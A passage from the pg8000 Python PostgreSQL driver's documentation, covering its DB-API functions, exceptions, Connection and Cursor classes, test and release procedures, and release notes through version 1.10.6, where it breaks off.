thread safety the DBAPI interface\nsupports. For pg8000, the threadsafety value is 1, meaning that threads may\nshare the module but not connections.\n\nThis property is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n==== pg8000.dbapi.paramstyle\n\nString property stating the type of parameter marker formatting expected by\nthe interface. This value defaults to \"format\", in which parameters are\nmarked in this format: \"WHERE name=%s\".\n\nThis property is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nAs an extension to the DBAPI specification, this value is not constant; it\ncan be changed to any of the following values:\n\nqmark::\n Question mark style, eg. `WHERE name=?`\n\nnumeric::\n Numeric positional style, eg. `WHERE name=:1`\n\nnamed::\n Named style, eg. `WHERE name=:paramname`\n\nformat::\n printf format codes, eg. `WHERE name=%s`\n\npyformat::\n Python format codes, eg. `WHERE name=%(paramname)s`\n\n\n==== pg8000.dbapi.STRING\n\nString type oid.\n\n==== pg8000.dbapi.BINARY\n\n\n==== pg8000.dbapi.NUMBER\n\nNumeric type oid.\n\n\n==== pg8000.dbapi.DATETIME\n\nTimestamp type oid\n\n\n==== pg8000.dbapi.ROWID\n\nROWID type oid\n\n\n=== Functions\n\n==== pg8000.dbapi.connect(user, host='localhost', database=None, port=5432, password=None, source_address=None, unix_sock=None, ssl_context=None, timeout=None, tcp_keepalive=True, application_name=None, replication=None)\n\nCreates a connection to a PostgreSQL database.\n\nThis property is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nuser::\n The username to connect to the PostgreSQL server with. If your server\n character encoding is not `ascii` or `utf8`, then you need to provide\n `user` as bytes, eg. `'my_name'.encode('EUC-JP')`.\n\nhost::\n The hostname of the PostgreSQL server to connect with. Providing this\n parameter is necessary for TCP\/IP connections. One of either `host` or\n `unix_sock` must be provided. The default is `localhost`.\n\ndatabase::\n The name of the database instance to connect with. If `None` then the\n PostgreSQL server will assume the database name is the same as the username.\n If your server character encoding is not `ascii` or `utf8`, then you need to\n provide `database` as bytes, eg. `'my_db'.encode('EUC-JP')`.\n\nport::\n The TCP\/IP port of the PostgreSQL server instance. This parameter defaults\n to `5432`, the registered common port of PostgreSQL TCP\/IP servers.\n\npassword::\n The user password to connect to the server with. This parameter is optional;\n if omitted and the database server requests password-based authentication,\n the connection will fail to open. If this parameter is provided but not\n requested by the server, no error will occur. +\n +\n If your server character encoding is not `ascii` or `utf8`, then\n you need to provide `password` as bytes, eg.\n `'my_password'.encode('EUC-JP')`.\n\n\nsource_address::\n The source IP address which initiates the connection to the PostgreSQL server.\n The default is `None` which means that the operating system will choose the\n source address.\n\nunix_sock::\n The path to the UNIX socket to access the database through, for example,\n `'\/tmp\/.s.PGSQL.5432'`. One of either `host` or `unix_sock` must be provided.\n\nssl_context::\n This governs SSL encryption for TCP\/IP sockets. It can have three values:\n * `None`, meaning no SSL (the default)\n * `True`, means use SSL with an\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\n created using\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.create_default_context[`ssl.create_default_context()`]\n * An instance of\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\n which will be used to create the SSL connection. +\n +\n If your PostgreSQL server is behind an SSL proxy, you can set the\n pg8000-specific attribute `ssl.SSLContext.request_ssl = False`, which\n tells pg8000 to use an SSL socket, but not to request SSL from the\n PostgreSQL server. Note that this means you can't use SCRAM\n authentication with channel binding.\n\ntimeout::\n This is the time in seconds before the connection to the server will time\n out. The default is `None` which means no timeout.\n\ntcp_keepalive::\n If `True` then use\n https:\/\/en.wikipedia.org\/wiki\/Keepalive#TCP_keepalive[TCP keepalive]. The\n default is `True`.\n\napplication_name::\n Sets the https:\/\/www.postgresql.org\/docs\/current\/runtime-config-logging.html#GUC-APPLICATION-NAME[application_name]. If your server character encoding is not\n `ascii` or `utf8`, then you need to provide values as bytes, eg.\n `'my_application_name'.encode('EUC-JP')`. The default is `None` which means\n that the server will set the application name.\n\nreplication::\n Used to run in https:\/\/www.postgresql.org\/docs\/12\/protocol-replication.html[streaming replication mode].\n If your server character encoding is not `ascii` or `utf8`, then you need to\n provide values as bytes, eg. `'database'.encode('EUC-JP')`.\n\n\n==== pg8000.dbapi.Date(year, month, day)\n\nConstuct an object holding a date value.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.date`\n\n\n==== pg8000.dbapi.Time(hour, minute, second)\n\nConstruct an object holding a time value.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.time`\n\n\n==== pg8000.dbapi.Timestamp(year, month, day, hour, minute, second)\n\nConstruct an object holding a timestamp value.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.datetime`\n\n\n==== pg8000.dbapi.DateFromTicks(ticks)\n\nConstruct an object holding a date value from the given ticks value (number of\nseconds since the epoch).\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.datetime`\n\n\n==== pg8000.dbapi.TimeFromTicks(ticks)\n\nConstruct an objet holding a time value from the given ticks value (number of\nseconds since the epoch).\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.time`\n\n\n==== pg8000.dbapi.TimestampFromTicks(ticks)\n\nConstruct an object holding a timestamp value from the given ticks value\n(number of seconds since the epoch).\n\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.datetime`\n\n\n==== pg8000.dbapi.Binary(value)\n\nConstruct an object holding binary data.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `bytes`.\n\n\n=== Generic Exceptions\n\nPg8000 uses the standard DBAPI 2.0 exception tree as \"generic\" exceptions.\nGenerally, more specific exception types are raised; these specific exception\ntypes are derived from the generic exceptions.\n\n==== pg8000.dbapi.Warning\n\nGeneric exception raised for important database warnings like data truncations.\nThis exception is not currently used by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n==== pg8000.dbapi.Error\n\nGeneric exception that is the base exception of all other error exceptions.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.InterfaceError\n\nGeneric exception raised for errors that are related to the database interface\nrather than the database itself. For example, if the interface attempts to use\nan SSL connection but the server refuses, an InterfaceError will be raised.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.DatabaseError\n\nGeneric exception raised for errors that are related to the database. This\nexception is currently never raised by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.DataError\n\nGeneric exception raised for errors that are due to problems with the processed\ndata. This exception is not currently raised by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.OperationalError\n\nGeneric exception raised for errors that are related to the database's\noperation and not necessarily under the control of the programmer. This\nexception is currently never raised by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.IntegrityError\n\nGeneric exception raised when the relational integrity of the database is\naffected. This exception is not currently raised by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.InternalError\n\nGeneric exception raised when the database encounters an internal error. This\nis currently only raised when unexpected state occurs in the pg8000 interface\nitself, and is typically the result of a interface bug.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.ProgrammingError\n\nGeneric exception raised for programming errors. For example, this exception\nis raised if more parameter fields are in a query string than there are\navailable parameters.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.NotSupportedError\n\nGeneric exception raised in case a method or database API was used which is not\nsupported by the database.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n=== Classes\n\n\n==== pg8000.dbapi.Connection\n\nA connection object is returned by the `pg8000.connect()` function. It\nrepresents a single physical connection to a PostgreSQL database.\n\n===== pg8000.dbapi.Connection.notifications\n\nA deque of server-side\nhttps:\/\/www.postgresql.org\/docs\/current\/sql-notify.html[notifications] received\nby this database connection (via the LISTEN \/ NOTIFY PostgreSQL commands). Each\nlist item is a three-element tuple containing the PostgreSQL backend PID that\nissued the notify, the channel and the payload.\n\nThis attribute is not part of the DBAPI standard; it is a pg8000 extension.\n\n\n===== pg8000.dbapi.Connection.notices\n\nA deque of server-side notices received by this database connection.\n\nThis attribute is not part of the DBAPI standard; it is a pg8000 extension.\n\n\n===== pg8000.dbapi.Connection.parameter_statuses\n\nA deque of server-side parameter statuses received by this database connection.\n\nThis attribute is not part of the DBAPI standard; it is a pg8000 extension.\n\n\n===== pg8000.dbapi.Connection.autocommit\n\nFollowing the DB-API specification, autocommit is off by default. It can be\nturned on by setting this boolean pg8000-specific autocommit property to True.\n\nNew in version 1.9.\n\n\n===== pg8000.dbapi.Connection.close()\n\nCloses the database connection.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.cursor()\n\nCreates a `pg8000.Cursor` object bound to this connection.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.rollback()\n\nRolls back the current database transaction.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_begin(xid)\n\nBegins a TPC transaction with the given transaction ID xid. This method should\nbe called outside of a transaction (i.e. nothing may have executed since the\nlast `commit()` or `rollback()`. Furthermore, it is an error to call\n`commit()` or `rollback()` within the TPC transaction. A `ProgrammingError` is\nraised, if the application calls `commit()` or `rollback()` during an active\nTPC transaction.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_commit(xid=None)\n\nWhen called with no arguments, `tpc_commit()` commits a TPC transaction\npreviously prepared with `tpc_prepare()`. If `tpc_commit()` is called prior to\n`tpc_prepare()`, a single phase commit is performed. A transaction manager may\nchoose to do this if only a single resource is participating in the global\ntransaction.\n\nWhen called with a transaction ID `xid`, the database commits the given\ntransaction. If an invalid transaction ID is provided, a\nProgrammingError will be raised. This form should be called outside of\na transaction, and is intended for use in recovery.\n\nOn return, the TPC transaction is ended.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_prepare()\n\nPerforms the first phase of a transaction started with .tpc_begin(). A\nProgrammingError is be raised if this method is called outside of a TPC\ntransaction.\n\nAfter calling `tpc_prepare()`, no statements can be executed until\n`tpc_commit()` or `tpc_rollback()` have been called.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_recover()\n\nReturns a list of pending transaction IDs suitable for use with\n`tpc_commit(xid)` or `tpc_rollback(xid)`\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_rollback(xid=None)\n\nWhen called with no arguments, `tpc_rollback()` rolls back a TPC transaction.\nIt may be called before or after `tpc_prepare()`.\n\nWhen called with a transaction ID xid, it rolls back the given transaction. If\nan invalid transaction ID is provided, a `ProgrammingError` is raised. This\nform should be called outside of a transaction, and is intended for use in\nrecovery.\n\nOn return, the TPC transaction is ended.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n===== pg8000.dbapi.Connection.xid(format_id, global_transaction_id, branch_qualifier)\n\nCreate a Transaction IDs (only global_transaction_id is used in pg) format_id\nand branch_qualifier are not used in postgres global_transaction_id may be any\nstring identifier supported by postgres returns a tuple (format_id,\nglobal_transaction_id, branch_qualifier)\n\n\n==== pg8000.dbapi.Cursor\n\nA cursor object is returned by the `pg8000.dbapi.Connection.cursor()` method\nof a connection. It has the following attributes and methods:\n\n===== pg8000.dbapi.Cursor.arraysize\n\nThis read\/write attribute specifies the number of rows to fetch at a time with\n`pg8000.dbapi.Cursor.fetchmany()`. It defaults to 1.\n\n\n===== pg8000.dbapi.Cursor.connection\n\nThis read-only attribute contains a reference to the connection object\n(an instance of `pg8000.dbapi.Connection`) on which the cursor was created.\n\nThis attribute is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.rowcount\n\nThis read-only attribute contains the number of rows that the last\n`execute()` or `executemany()` method produced (for query statements like\n`SELECT`) or affected (for modification statements like `UPDATE`.\n\nThe value is -1 if:\n\n* No `execute()` or `executemany()` method has been performed yet on the\n cursor.\n* There was no rowcount associated with the last `execute()`.\n* At least one of the statements executed as part of an `executemany()` had no\n row count associated with it.\n* Using a `SELECT` query statement on a PostgreSQL server older than version\n 9.\n* Using a `COPY` query statement on PostgreSQL server version 8.1 or older.\n\nThis attribute is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.description\n\nThis read-only attribute is a sequence of 7-item sequences. Each value contains\ninformation describing one result column. The 7 items returned for each column\nare (name, type_code, display_size, internal_size, precision, scale, null_ok).\nOnly the first two values are provided by the current implementation.\n\nThis attribute is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.close()\n\nCloses the cursor.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.execute(operation, args=None, stream=None)\n\nExecutes a database operation. Parameters may be provided as a sequence, or as\na mapping, depending upon the value of `pg8000.paramstyle`. Returns the cursor,\nwhich may be iterated over.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\noperation::\n The SQL statement to execute.\n\nargs::\n If `pg8000.dbapi.paramstyle` is `qmark`, `numeric`, or `format`, this\nargument should be an array of parameters to bind into the statement. If\n`pg8000.dbapi.paramstyle` is `named`, the argument should be a `dict` mapping of\nparameters. If `pg8000.dbapi.paramstyle' is `pyformat`, the argument value may be\neither an array or a mapping.\n\nstream::\n This is a pg8000 extension for use with the PostgreSQL\nhttp:\/\/www.postgresql.org\/docs\/current\/static\/sql-copy.html[COPY] command. For\na `COPY FROM` the parameter must be a readable file-like object, and for\n`COPY TO` it must be writable.\n\nNew in version 1.9.11.\n\n\n===== pg8000.dbapi.Cursor.executemany(operation, param_sets)\n\nPrepare a database operation, and then execute it against all parameter\nsequences or mappings provided.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\noperation::\n The SQL statement to execute.\nparameter_sets::\n A sequence of parameters to execute the statement with. The values in the\n sequence should be sequences or mappings of parameters, the same as the args\n argument of the `pg8000.dbapi.Cursor.execute()` method.\n\n\n===== pg8000.dbapi.Cursor.callproc(procname, parameters=None)\n\nCall a stored database procedure with the given name and optional parameters.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\nprocname::\n The name of the procedure to call.\n\nparameters::\n A list of parameters.\n\n\n===== pg8000.dbapi.Cursor.fetchall()\n\nFetches all remaining rows of a query result.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: A sequence, each entry of which is a sequence of field values making\nup a row.\n\n\n===== pg8000.dbapi.Cursor.fetchmany(size=None)\n\nFetches the next set of rows of a query result.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nsize::\n The number of rows to fetch when called. If not provided, the\n `pg8000.dbapi.Cursor.arraysize` attribute value is used instead.\n\nReturns: A sequence, each entry of which is a sequence of field values making\nup a row. If no more rows are available, an empty sequence will be returned.\n\n\n===== pg8000.dbapi.Cursor.fetchone()\n\nFetch the next row of a query result set.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: A row as a sequence of field values, or `None` if no more rows are\navailable.\n\n\n===== pg8000.dbapi.Cursor.setinputsizes(*sizes)\n\nUsed to set the parameter types of the next query. This is useful if it's\ndifficult for pg8000 to work out the types from the parameters themselves\n(eg. for parameters of type None).\n\nsizes::\n Positional parameters that are either the Python type of the parameter to be\n sent, or the PostgreSQL oid. Common oids are available as constants such as\n pg8000.STRING, pg8000.INTEGER, pg8000.TIME etc.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.setoutputsize(size, column=None)\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification], however, it\nis not implemented by pg8000.\n\n\n==== pg8000.dbapi.Interval\n\nAn Interval represents a measurement of time. In PostgreSQL, an interval is\ndefined in the measure of months, days, and microseconds; as such, the pg8000\ninterval type represents the same information.\n\nNote that values of the `pg8000.Interval.microseconds`, `pg8000.Interval.days`,\nand `pg8000.Interval.months` properties are independently measured and cannot\nbe converted to each other. A month may be 28, 29, 30, or 31 days, and a day\nmay occasionally be lengthened slightly by a leap second.\n\n\n===== pg8000.dbapi.Interval.microseconds\n\nMeasure of microseconds in the interval.\n\nThe microseconds value is constrained to fit into a signed 64-bit integer. Any\nattempt to set a value too large or too small will result in an OverflowError\nbeing raised.\n\n\n===== pg8000.dbapi.Interval.days\n\nMeasure of days in the interval.\n\nThe days value is constrained to fit into a signed 32-bit integer. Any attempt\nto set a value too large or too small will result in an OverflowError being\nraised.\n\n\n===== pg8000.dbapi.Interval.months\n\nMeasure of months in the interval.\n\nThe months value is constrained to fit into a signed 32-bit integer. Any\nattempt to set a value too large or too small will result in an OverflowError\nbeing raised.\n\n\n== Tests\n\nInstall http:\/\/testrun.org\/tox\/latest\/[tox]:\n\n pip install tox\n\nEnable the PostgreSQL hstore extension by running the SQL command:\n\n create extension hstore;\n\nand add a line to pg_hba.conf for the various authentication options:\n\n....\nhost pg8000_md5 all 127.0.0.1\/32 md5\nhost pg8000_gss all 127.0.0.1\/32 gss\nhost pg8000_password all 127.0.0.1\/32 password\nhost pg8000_scram_sha_256 all 127.0.0.1\/32 scram-sha-256\nhost all all 127.0.0.1\/32 trust\n....\n\nthen run `tox` from the `pg8000` directory:\n\n`tox`\n\nThis will run the tests against the Python version of the virtual environment,\non the machine, and the installed PostgreSQL version listening on port 5432, or\nthe `PGPORT` environment variable if set.\n\nBenchmarks are run as part of the test suite at `tests\/test_benchmarks.py`.\n\n\n== Doing A Release Of pg8000\n\nRun `tox` to make sure all tests pass, then update the release notes, then do:\n\n....\ngit tag -a x.y.z -m \"version x.y.z\"\nrm -r build\nrm -r dist\npython setup.py sdist bdist_wheel --python-tag py3\nfor f in dist\/*; do gpg --detach-sign -a $f; done\ntwine upload dist\/*\n....\n\n\n== Release Notes\n\n=== Version 1.19.1, 2021-04-03\n\n* Fix bug where setinputsizes() was only used for the first parameter set of\n executemany().\n\n* Support more PostgreSQL array types.\n\n\n=== Version 1.19.0, 2021-03-28\n\n* Network error exceptions are now wrapped in an `InterfaceError`, with the\n original exception as the cause. The error message for network errors allways\n start with the string `network error`.\n\n* Upgraded to version 1.3.0 of Scramp, which has better error handling.\n\n\n=== Version 1.18.0, 2021-03-06\n\n* The `pg8000.dbapi.Cursor.callproc()` method is now implemented.\n\n* SCRAM channel binding is now supported. That means SCRAM mechanisms ending in\n '-PLUS' such as SCRAM-SHA-256-PLUS are now supported when connecting to the\n server.\n\n* A custom attribute `ssl.SSLContext.request_ssl` can be set to `False` to\n tell pg8000 to connect using an SSL socket, but to not request SSL from\n the PostgreSQL server. This is useful if you're connecting to a PostgreSQL\n server that's behind an SSL proxy.\n\n\n=== Version 1.17.0, 2021-01-30\n\n* The API is now split in two, pg8000.native and pg8000.dbapi. The legacy API\n still exists in this release, but will be removed in another release. The\n idea is that pg8000.dbapi can stick strictly to the DB-API 2 specification,\n while pg8000.native can focus on useability without having to worry about\n compatibility with the DB-API standard.\n\n* The column name in `Connection.description` used to be returned as a\n `bytes` but now it's returned as a `str`.\n\n* Removed extra wrapper types PGJson, PGEnum etc. These were never properly\n documented and the problem they solve can be solved using CAST in the SQL or\n by using setinputsizes.\n\n\n\n=== Version 1.16.6, 2020-10-10\n\n* The column name in `Connection.description` used to be returned as a\n `bytes` but now it's returned as a `str`.\n\n* Removed extra wrapper types PGJson, PGEnum etc. These were never properly\n documented and the problem they solve can be solved using CAST in the SQL or\n by using setinputsizes.\n\n\n=== Version 1.16.5, 2020-08-07\n\n* The TPC method `Connection.tpc_prepare()` was broken.\n\n\n=== Version 1.16.4, 2020-08-03\n\n* Include the `payload` in the tuples in `Connection.notifications`.\n* More constants (eg. `DECIMAL` and `TEXT_ARRAY`) are now available for\n PostgreSQL types that are used in `setinputsizes()`.\n\n\n=== Version 1.16.3, 2020-07-26\n\n* If an unrecognized parameter is sent to `Cursor.setinputsizes()` use the\n `pg8000.UNKNOWN` type (705).\n* When communicating with a PostgreSQL server with version < 8.2.0, `FETCH`\n commands don't have a row count.\n* Include in the source distribution all necessary test files from the `test`\n directory in\n\n\n=== Version 1.16.2, 2020-07-25\n\n* Use the\n https:\/\/www.postgresql.org\/docs\/current\/protocol-flow.html#id-1.10.5.7.4[simple query]\n cycle for queries that don't have parameters. This should give a performance\n improvement and also means that multiple statements can be executed in one go\n (as long as they don't have parameters) whereas previously the `sqlparse` had\n to be used.\n\n\n=== Version 1.16.1, 2020-07-18\n\n* Enable the `Cursor.setinputsizes()` method. Previously this method didn't\n do anything. It's an optional method of the DBAPI 2.0 specification.\n\n\n=== Version 1.16.0, 2020-07-11\n\n* This is a backwardly incompatible release of pg8000.\n\n* All data types are now sent as text rather than binary.\n\n* Using adapters, custom types can be plugged in to pg8000.\n\n* Previously, named prepared statements were used for all statements.\n Now unnamed prepared statements are used by default, and named prepared\n statements can be used explicitly by calling the Connection.prepare()\n method, which returns a PreparedStatement object.\n\n\n=== Version 1.15.3, 2020-06-14\n\n* For TCP connections (as opposed to Unix socket connections) the\n https:\/\/docs.python.org\/3\/library\/socket.html#socket.create_connection[`socket.create_connection`]\n function is now used. This means pg8000 now works with IPv6 as well as IPv4.\n\n* Better error messages for failed connections. A 'cause' exception is now\n added to the top-level pg8000 exception, and the error message contains the\n details of what was being connected to (host, port etc.).\n\n\n=== Version 1.15.2, 2020-04-16\n\n* Added a new method `run()` to the connection, which lets you run queries\n directly without using a `Cursor`. It always uses the `named` parameter\n style, and the parameters are provided using keyword arguments. There are now\n two sets of interactive examples, one using the pg8000 extensions, and one\n using just DB-API features.\n\n* Better error message if certain parameters in the `connect()` function are of\n the wrong type.\n\n* The constructor of the `Connection` class now has the same signature as the\n `connect()` function, which makes it easier to use the `Connection` class\n directly if you want to.\n\n\n=== Version 1.15.1, 2020-04-04\n\n* Up to now the only supported way to create a new connection was to use the\n `connect()` function. However, some people are using the `Connect` class\n directly and this change makes it a bit easier to do that by making the class\n use a contructor which has the same signature as the `connect()` function.\n\n\n=== Version 1.15.0, 2020-04-04\n\n* Abandon the idea of arbitrary `init_params` in the connect() function. We now\n go back to having a fixed number of arguments. The argument `replication` has\n been added as this is the only extra init param that was needed. The reason\n for going back to a fixed number of aguments is that you get better feedback\n if you accidently mis-type a parameter name.\n\n* The `max_prepared_statements` parameter has been moved from being a module\n property to being an argument of the connect() function.\n\n\n=== Version 1.14.1, 2020-03-23\n\n* Ignore any `init_params` that have a value of `None`. This seems to be more\n useful and the behaviour is more expected.\n\n\n=== Version 1.14.0, 2020-03-21\n\n* Tests are now included in the source distribution.\n\n* Any extra keyword parameters of the `connect()` function are sent as\n initialization parameters when the PostgreSQL session starts. See the API\n docs for more information. Thanks to Patrick Hayes for suggesting this.\n\n* The ssl.wrap_socket function is deprecated, so we now give the user the\n option of using a default `SSLContext` or to pass in a custom one. This is a\n backwardly incompatible change. See the API docs for more info. Thanks to\n Jonathan Ross Rogers <jrogers@emphasys-software.com> for his work on this.\n\n* Oversized integers are now returned as a `Decimal` type, whereas before a\n `None` was returned. Thanks to Igor Kaplounenko <igor.kaplounenko@intel.com>\n for his work on this.\n\n* Allow setting of connection source address in the `connect()` function. See\n the API docs for more details. Thanks to David King\n <davidking@davids-mbp.home> for his work on this.\n\n\n=== Version 1.13.2, 2019-06-30\n\n* Use the https:\/\/pypi.org\/project\/scramp\/[Scramp] library for the SCRAM\n implementation.\n\n* Fixed bug where SQL such as `make_interval(days := 10)` fail on the `:=`\n part. Thanks to https:\/\/github.com\/sanepal[sanepal] for reporting this.\n\n\n=== Version 1.13.1, 2019-02-06\n\n* We weren't correctly uploading releases to PyPI, which led to confusion\n when dropping Python 2 compatibility. Thanks to\n https:\/\/github.com\/piroux[Pierre Roux] for his\n https:\/\/github.com\/tlocke\/pg8000\/issues\/7[detailed explanation] of what\n went wrong and how to correct it.\n\n* Fixed bug where references to the `six` library were still in the code, even\n though we don't use `six` anymore.\n\n\n=== Version 1.13.0, 2019-02-01\n\n* Remove support for Python 2.\n\n* Support the scram-sha-256 authentication protocol. Reading through the\n https:\/\/github.com\/cagdass\/scrampy code was a great help in implementing\n this, so thanks to https:\/\/github.com\/cagdass[cagdass] for his code.\n\n\n=== Version 1.12.4, 2019-01-05\n\n* Support the PostgreSQL cast operator `::` in SQL statements.\n\n* Added support for more advanced SSL options. See docs on `connect` function\n for more details.\n\n* TCP keepalives enabled by default, can be set in the `connect` function.\n\n* Fixed bug in array dimension calculation.\n\n* Can now use the `with` keyword with connection objects.\n\n\n=== Version 1.12.3, 2018-08-22\n\n* Make PGVarchar and PGText inherit from `str`. Simpler than inheriting from\n a PGType.\n\n\n=== Version 1.12.2, 2018-06-28\n\n* Add PGVarchar and PGText wrapper types. This allows fine control over the\n string type that is sent to PostgreSQL by pg8000.\n\n\n=== Version 1.12.1, 2018-06-12\n\n\n* Revert back to the Python 3 `str` type being sent as an `unknown` type,\n rather than the `text` type as it was in the previous release. The reason is\n that with the `unknown` type there's the convenience of using a plain Python\n string for JSON, Enum etc. There's always the option of using the\n `pg8000.PGJson` and `pg8000.PGEnum` wrappers if precise control over the\n PostgreSQL type is needed.\n\n\n=== Version 1.12.0, 2018-06-12\n\nNote that this version is not backward compatible with previous versions.\n\n* The Python 3 `str` type was sent as an `unknown` type, but now it's sent as\n the nearest PostgreSQL type `text`.\n\n* pg8000 now recognizes that inline SQL comments end with a newline.\n\n* Single `%` characters now allowed in SQL comments.\n\n* The wrappers `pg8000.PGJson`, `pg8000.PGJsonb` and `pg8000.PGTsvector` can\n now be used to contain Python values to be used as parameters. The wrapper\n `pg8000.PGEnum` can by used for Python 2, as it doesn't have a standard\n `enum.Enum` type.\n\n\n=== Version 1.11.0, 2017-08-16\n\nNote that this version is not backward compatible with previous versions.\n\n* The Python `int` type was sent as an `unknown` type, but now it's sent as the\n nearest matching PostgreSQL type. Thanks to Patrick Hayes.\n\n* Prepared statements are now closed on the server when pg8000 clears them from\n its cache.\n\n* Previously a `%` within an SQL literal had to be escaped, but this is no\n longer the case.\n\n* Notifications, notices and parameter statuses are now handled by simple\n `dequeue` buffers. See docs for more details.\n\n* Connections and cursors are no longer threadsafe. So to be clear, neither\n connections or cursors should be shared between threads. One thread per\n connection is mandatory now. This has been done for performance reasons, and\n to simplify the code.\n\n* Rather than reading results from the server in batches, pg8000 now always\n downloads them in one go. This avoids `portal closed` errors and makes things\n a bit quicker, but now one has to avoid downloading too many rows in a single\n query.\n\n* Attempts to return something informative if the returned PostgreSQL timestamp\n value is outside the range of the Python datetime.\n\n* Allow empty arrays as parameters, assume they're of string type.\n\n* The cursor now has a context manager, so it can be used with the `with`\n keyword. Thanks to Ildar Musin.\n\n* Add support for `application_name` parameter when connecting to database,\n issue https:\/\/github.com\/mfenniak\/pg8000\/pull\/106[#106]. Thanks to\n https:\/\/github.com\/vadv[@vadv] for the contribution.\n\n* Fix warnings from PostgreSQL \"not in a transaction\", when calling\n ``.rollback()`` while not in a transaction, issue\n https:\/\/github.com\/mfenniak\/pg8000\/issues\/113[#113]. Thanks to\n https:\/\/github.com\/jamadden[@jamadden] for the contribution.\n\n* Errors from the server are now always passed through in full.\n\n\n=== Version 1.10.6, 2016-06-10\n\n* Fixed a problem where we weren't handling the 